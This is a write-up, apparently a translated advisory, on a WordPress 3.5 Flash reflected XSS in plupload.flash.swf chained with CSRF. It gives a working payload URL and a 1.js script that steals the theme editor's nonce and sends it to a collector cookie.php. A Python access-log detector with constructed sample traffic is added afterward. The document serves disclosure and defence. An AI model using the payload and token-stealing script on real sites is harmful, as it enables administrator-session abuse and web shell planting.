The anti-CSRF token that protects template modification in the WordPress admin area can be bypassed. Combined with social engineering, this really can be used to get a shell.

No. This vulnerability does not exist in version 3.5.1 and earlier versions. WordPress 3.5 and later versions have a Flash XSS; for details, see "Flash Application Security Series [3] -- WordPress reflective cross-site (0 day)".

An attacker could add a shell via CSRF once you click their link, but the anti-CSRF token stands in the way. With this XSS, however, they can steal the anti-CSRF token and then use CSRF to get a shell without trouble.

Suppose we want to steal the token of the 404 template. With a bit of social engineering, add the following link in a comment:

    http://localhost/wp-uplodes/js/plupload/plupload.flash.swf?id=0\%22%29%29}catch%28e%29{if%28!window.x%29{window.x=1;document.write('<script src=http://localhost/1.js></script>');}//

The content of 1.js is:

    x = window.open('http://localhost/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve');
    setTimeout("fuck(x)", 5000);
    function fuck(x) {
        var a = x.document.getElementById('_wpnonce').value;
        alert(a);
        location.href = 'http://localhost/cookie.php?c=' + a;
    }

The content of the local cookie.php is:

    <?php fputs(fopen("cookie.txt", "w"), $_GET[c]); ?>

After the administrator clicks the link, you can see what you want in cookie.txt. It is worth noting that this token will never change unless you reinstall WP. Well, you know the rest.
Solution:
Upgrade
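Besides upgrading, a site operator will want to know whether this chain was ever attempted. The following is an added example (not part of the original write-up) that scans web server access logs for the two stages that are visible on the victim site: the plupload.flash.swf file being requested with script fragments in its id parameter, and theme-editor.php being opened or posted to with a Referer from another host. The "combined" log format, the site hostname, the swf's directory (wp-includes/js/plupload) and every log line are assumptions or constructed sample data.

```python
"""Detect the plupload.flash.swf reflected-XSS -> theme-editor CSRF chain in access logs.

Added example; not from the original write-up.  All log lines are constructed.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Apache/nginx "combined" log format (assumed; adjust the regex for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Hostname of the protected WordPress site (assumption).
SITE_HOST = "localhost"

# A legitimate swf request has no id parameter containing JS; these fragments
# match the style of payload shown in the write-up (closing the injected string,
# catch blocks, document/window access).
XSS_MARKERS = (")", "}", "<script", "document.", "window.", "catch")

# Constructed sample traffic: a probe against the swf, then the admin being
# steered to theme-editor.php from an attacker-controlled page.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2013:12:00:01 +0000] "GET /wp-content/plugins/x/readme.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2013:12:00:02 +0000] "GET /wp-includes/js/plupload/plupload.flash.swf?id=0%22%29%29}catch%28e%29{window.x=1}// HTTP/1.1" 200 30000 "http://localhost/?p=1" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2013:12:00:03 +0000] "GET /wp-includes/js/plupload/plupload.flash.swf HTTP/1.1" 200 30000 "http://localhost/wp-admin/media-new.php" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2013:12:00:10 +0000] "GET /wp-admin/theme-editor.php?file=404.php&theme=twentytwelve HTTP/1.1" 200 8000 "http://attacker.invalid/" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2013:12:00:12 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "http://attacker.invalid/" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2013:12:00:20 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "http://localhost/wp-admin/theme-editor.php?file=404.php" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["url"])
    entry["path"] = parts.path
    # Decode %22, %29 and friends so the markers are matched on what the browser executes.
    entry["query"] = unquote_plus(parts.query)
    return entry


def classify(entry):
    """Return the list of finding names for one parsed entry (empty if benign)."""
    findings = []
    if entry["path"].endswith("/plupload.flash.swf") and entry["query"]:
        if any(marker in entry["query"].lower() for marker in XSS_MARKERS):
            findings.append("swf_xss_probe")
    if entry["path"].endswith("/wp-admin/theme-editor.php"):
        referer_host = urlsplit(entry["referer"]).hostname if entry["referer"] != "-" else None
        # A template save (POST) whose Referer is not this site is the CSRF stage.
        if entry["method"] == "POST" and referer_host != SITE_HOST:
            findings.append("theme_editor_post_offsite_referer")
        # The write-up opens the editor via window.open from the attacker page,
        # so the GET may carry that page as Referer; a missing Referer is allowed.
        if entry["method"] == "GET" and referer_host not in (SITE_HOST, None):
            findings.append("theme_editor_opened_from_offsite")
    return findings


def scan(lines):
    """Scan log lines; return (client ip, path, findings) for every suspicious entry."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append((entry["ip"], entry["path"], findings))
    return hits


if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(findings)}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines. The swf stage is the strongest signal because a legitimate plupload request carries no JavaScript in its id parameter; the theme-editor findings are noisier (a Referer can be absent or stripped) and are best treated as corroboration, together with checking the modified date and contents of the theme's 404.php.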